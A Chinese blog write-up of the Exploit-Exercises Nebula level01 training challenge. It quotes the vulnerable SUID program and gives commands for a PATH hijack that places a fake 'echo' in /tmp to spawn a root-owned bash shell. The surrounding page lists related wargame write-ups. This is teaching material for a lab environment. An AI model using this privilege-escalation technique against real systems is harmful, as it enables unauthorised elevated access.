ExploitExercises_Nebula_Level01

最新推荐文章于 2020-07-20 22:24:54 发布
最新推荐文章于 2020-07-20 22:24:54 发布
阅读量1.3k 收藏
点赞数
分类专栏: ExploitExercise
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hurricane_0x01/article/details/53884250
版权

题目源码如下:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

运行后输出: and now what,即echo命令参数。

查看/home/flag01/flag01文件属性,发现设置了SUID项。

为了获取shell,想法是echo命令替换为/bin/bah,具体操作如下:

1. 修改环境变量

export PATH=/tmp:$PATH

2. 创建符号链接 

ln -s /bin/bash /tmp/echo

此时运行/home/flag01/flag01程序,提示No such file or directory,这是因为原程序中echo有参数,而/bin/bash无法执行。

3. 删除上步中/rmp/echo文件,在/tmp目录下创建新的echo文件,将#/bin/bash\r\n/bin/bash写入文件 

echo -e '#/bin/bash\r\n/bin/bash' > /tmp/echo; chmod +x /tmp/echo
4. 运行/home/flag01/flag01,用户切换至flag01,运行getflag命令,提示成功


小黑话不多
关注
专栏目录
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
04-25
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
免考final linux提权与渗透入门——Exploit-Exercise Nebula学习与实践
weixin_30908103的博客
06-01 808
免考final linux提权与渗透入门——Exploit-Exercise Nebula学习与实践 0x0 前言 Exploit-Exercise是一系列学习linux下渗透的虚拟环境,官网是https://exploit-exercises.com/,通过它可以学习提权,漏洞利用,逆向等知识 我们这里尝试的是Nebula,是一个涵盖初级、中级挑战任务的练习环境,一个有20个关卡。涉及到的知识点...
Exploit-ExerciseNebula实践(二)
Yale的博客
01-13 405
获取06关卡的flag。 06 题目提示flag06的密码来自传统的unix系统 这就意味这密文存储在/etc/psswd。我们直接读取 过滤一下 导出为cre.txt 接下来我们就需要破解该密文 我们在kali中破解 首先在kali上sftp连接nebula,将cre.txt下载到本机 在桌面就生成了cre.txt 在终端中首先切换到桌面,然后使用john破解 得到密码为hel...
Exploit-ExerciseNebula实践(一)
Yale的博客
01-13 962
获取00关卡的flag。 题目提示需要查找以”flag00”账户运行的设置了SUID的程序,并提示我们可以从跟目录开始查找 找到了了之后执行这个程序,我们这个用户“level00”就或者“flag00”的权限,也就可以getflag了 那么怎么找到符合要求的程序呢? 首先切换到根目录 由于我们目前的登录的是level00,在搜索没有权限进入的目录时会出错,所以为了避免干扰需要将错误信息输入到/d...
Exploit-ExerciseProtostar-format
Yale的博客
07-20 372
0x00 Protostar涉及栈溢出、堆溢出、格式化字符串漏洞、网络编程、及综合性漏洞。 本文将介绍format部分。 关于环境准备,在官网https://exploit-exercises.lains.space/protostar/下载即可。下载后得到iso镜像,使用vmware安装。然后使用user/user即可登录 查看ip 知道ip后可以在kali中ssh连上 输入user即可 机器上所有需要分析的程序都在如下路径 0x01 第一关,fotmat0 我们的目标是控制target为0xde
digital_nebula
09-02
digital_nebula
golden_nebula
09-02
golden_nebula
Pulsar_wind_nebula_Spectral_analysis
02-09
脉冲星风 nebula(Pulsar Wind Nebula,PWN)是高能天体物理领域的一个重要研究对象,由旋转的中子星——脉冲星的极高速度粒子流与周围环境相互作用形成。在“Pulsar_wind_nebula_Spectral_analysis”这个主题下,...
抽象精品ppt模板golden_nebula234
09-02
抽象精品ppt模板golden_nebula234
A_dataset_generatorgraph_modeling_demo_of_Shareho_nebula-shar
最新发布
09-15
A_dataset_generatorgraph_modeling_demo_of_Shareho_nebula-shareholding-example
i春秋 - Exploit-Exercises: Nebula - level01
无节操
02-25 2567
AboutThere is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?To do this level, log in as the level01 account with the password level01. Files for th
i春秋 - Exploit-Exercises: Nebula(1)
大博的博客
04-29 1552
还是老哥的锅,兴冲冲的给我说这个比赛很有意思,一脸懵逼的进来,但是绝对不会一脸懵逼的出去。这个对于我这个才是WEB方面的小白的我来说有点懵逼,最后百度了百度还是懂了一点。那就写下我做这个题的想法。nebula其实就是专门针对linux提权训练的一个靶机,就这个我需要理解很多知识顺便补充了一个find命令(这个find命令补充还是在我的博客里)find / -user flag00 -perm -4...
Exploit Exercises Nebula 中总结linux的基础漏洞和一些小知识点
giantbranch的专栏
03-25 1654
Exploit Exercises Nebula 中总结linux的基础漏洞和一些小知识点第一次使用markdown进行写文章,其实如果markdown编辑器支持qq截图直接粘贴就好了我觉学习了就应该有个总结,这样才会更加的牢固 Exploit Exercises Nebula level00-19 学习记录搜索setuid/setgid的程序搜索一个setuid的程序,我们可以根据它的用户i
Exploit-exercises
MillionSky的专栏
04-09 2088
1 概述Exploit-Exercise是一个Linux平台下漏洞挖掘、分析的练习平台。网址为:https://exploit-exercises.com官方提供了个很多虚拟机、文档、挑战题目,用于学习各种计算机安全问题,如权限提升、漏洞分析、Exploit开发、调试、逆向工程和通用的网络安全问题。 目前有几个板块:NebulaProtostar、Fusion、Main Sequence、Clo...
Exploit-ExerciseNebula实践(四)
Yale的博客
01-13 484
获取15关卡的flag。 由题目的提示可知,这题需要用到strace,使用strace观察flag15的调用情况。 直接strace跟踪flag15 结果如下: 可以看到(图中受限于屏幕空间没有截全),flag15大量调用libc.so.6 再使用readelf查看 结果如下 可以看到程序对libc.so.6存在依赖,可题目没有提供。我们需要写libc.so.6到哪个路径,让.so...
Nebula level01
无心插柳
11-08 6897
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01 . Files for t
i春秋 - Exploit-Exercises: Nebula - level03
无节操
02-25 1961
AboutCheck the home directory of flag03 and take note of the files there.There is a crontab that is called every couple of minutes.思路先进flag文件夹看看cd /home/flag03 vim writable.sh#!/bin/shfor i in /home/fl
i春秋 - Exploit-Exercises: Nebula - level00
无节操
02-25 2480
AboutThis level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking dire
i春秋 - Exploit-Exercises: Nebula - level04
无节操
02-25 1209
AboutThis level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)Source#include <stdlib.h> #include <unistd.h> #include <string.h> #incl
table_name="ods_nebula_tb_customer" table_level_1="${table_name%%_*}"
07-15
根据你提供的代码,变量 `table_name` 的值是 "ods_nebula_tb_customer",而变量 `table_level_1` 则是通过截取 `table_name` 中第一个下划线之前的部分来得到的。 具体来说,`${table_name%%_*}` 是一种字符串替换...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值